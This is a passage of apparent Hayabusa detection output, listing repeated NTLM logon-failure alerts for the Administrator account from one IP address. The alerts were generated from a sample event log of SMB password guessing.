01:52:11.491 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0qklApBFOMxVzucD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.538 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0IJSphtLB3eNARBo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.582 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PLOFe4w5KpJ2UaGM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.620 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cF3JTWkGadY1fJE2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.666 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kyTH0jxSZB2YVdhW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.709 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NRq5XrcDkFvabCzh | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.750 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zlYwlgrsMy1kSgEC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.790 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AchwW4ifbZ41AQNg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1PaxF7Q8ue1Kex1h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WAhW2PErXdwNVrx5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.943 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LoAV3ESqieev2JMC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:12.012 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: wFlWFijaFirgsAtJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.049 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hSDjuqvzKLaWCWVo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.109 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SL0CVu787iFRLiPU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.219 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZQDORN33izpv4tGO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.253 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v470yorD43fgGyjC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.305 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LBbLWVZFDqFxb7dW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.360 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RJsowt9MrhXciLOZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.404 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uhCVFyMmDI5shASV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.452 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yd4SM9EGM7cnO6Z5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.490 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PSR1tbtzdDaJDbXs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.538 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rNqyjBuN0Pq6WRO1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.585 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vqpMAmE9OvHbFCh2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.632 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JfLQAaB0DPvxWQMB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.676 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A0kvHMwnj2k0HMLQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kPqfVDftcR4iRDaw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.748 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1bltwm2g13InAJM6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.788 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J2iFr8ppe5NzukXF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7EEUOBohBFRze6hL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.887 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NCOFn3WM71KmaZyB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UdUkBxB1auduRfdS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.980 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E2JaWoYK56HRGfW1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.015 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a3JTCX9NIOpg6TFB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.064 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zFGkdUVAdKcrrREB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.108 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7oZW00FpKema01Vw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.151 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p4HbNQx0Acf83b1h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j9aM5UCQbOLvcpI0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.238 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BGGChEAIdej9lBhr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4CaFYB1ImWAWbH0W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OLa3lkxWiJ00raQh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vMzyi0jIVLNrodC8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.409 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n2repX0roAP2j0TI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.460 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gqcpIjdkNpmoTe4A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.488 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Edgo9UdNvmMJpiyn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.532 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LpqOTu7Xn7ULipmN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.567 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TP0efL79STMbuu9g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.610 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HkwWfRi0E5sVY6UT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IkyCe9NXGExCQS5r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.698 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IGnhRwa7P7by9vJO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.740 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fh7IGliNbSyKwxpM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.782 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1QfgWsAqSYQfB9l5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.821 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q8VM66P8Vluf7yrL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.861 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cdYiwh3QjdA0Zoge | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.904 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ou3FPUI5bFcUvuFC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.952 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bMUg8N7apFtUgX9d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.991 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U7Cn4n7jQAQaxP6y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.024 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: urflPvd1vgYYi2ra | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pqFtTDD69fNTKROG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.113 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: teUZYpNyqJ64Dgcz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.152 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9kaKSy3DV5fRKvTc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gtiZUzpwrnuWIjna | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.238 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SD9UhsShNJRp251r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C5xbL7aO0azgBxfz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.342 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xqrUpW8PpI9RAeGk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.452 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M80K04eYwfwdzIul | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.497 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jcWY7cNeCNgJ3Czr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1OA561UrTkFnbEj3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iDnu1G7jmwLoXGLF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e2v70poTOKPUNZJo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.673 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EhzoOmgTrdvTS27z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pyvmBFGhKFgvzM9S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.772 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qHC0keHW2YsKeP02 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 29vkwuFa6njYc86s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s9687XPVHFiwttdm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AcNGaeTqTydGinJE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
